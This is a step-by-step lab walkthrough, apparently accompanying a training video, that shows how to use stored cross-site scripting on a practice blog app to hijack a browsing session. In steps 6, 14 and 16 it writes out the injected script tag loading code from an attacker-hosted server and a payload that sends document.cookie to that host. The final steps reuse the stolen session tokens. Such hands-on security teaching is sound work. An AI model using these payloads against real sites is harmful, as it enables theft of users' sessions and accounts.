Project 57 - Using XSS to Hijack a Browsing Session!

Описание: Steps Taken/Commands Used (in the order that they appear in the video):

1. Open a web browser and go to http://xssable:5000 (student, student)

2. Click on "My Blog" at the top and then click on the "Add blog post" button

3. Remove everything in the body of the post and enter script alert("body"); /script and Click Submit (Title the post "Test")

4. We don't see anything out of the ordinary yet but right click the page to View Page Source

5. Line 54 shows script alert("body"); /script

6. Click "Add blog post" again, remove what's in the body, and enter script src=http://192.168.1.101:1234/xss.js /script (to create a JavaScript that will contact a web server we will host and retrieve the test script)

7. Open a terminal and cd /home/kali/XSS (to change to the directory where the file will be stored)

8. nano xss.js (to create the XSS JavaScript using the text editor)

9. Enter in alert("!"); (to create a basic test to confirm that I can bypass the filter)

10. python3 -m http.server 1234 (to host a simple Python web server over port 1234)

11. Go back to the webpage and refresh the page. The alert should now appear.

12. Ctl + C in the terminal to stop the web server

13. cd /home/kali/XSS and nano xss.js (to open the Javascript back open for editing)

14. Replace the current code with new Image().src=http://192.168.1.101:1234/+document.cookie; (to send me the user's cookies and I can use this to steal their session).

15. python3 -m http.server 1234 (to host a simple Python web server over port 1234)

16. Click "Add blog post" again, remove what's in the body, and enter script src=http://192.168.1.101:1234/xss.js /script

17. Open Mouse Pad and get read to capture the session cookie

18. Copy the Token and the Session cookies, right click page, Inspect Element, Storage, Cookies and paste the tokens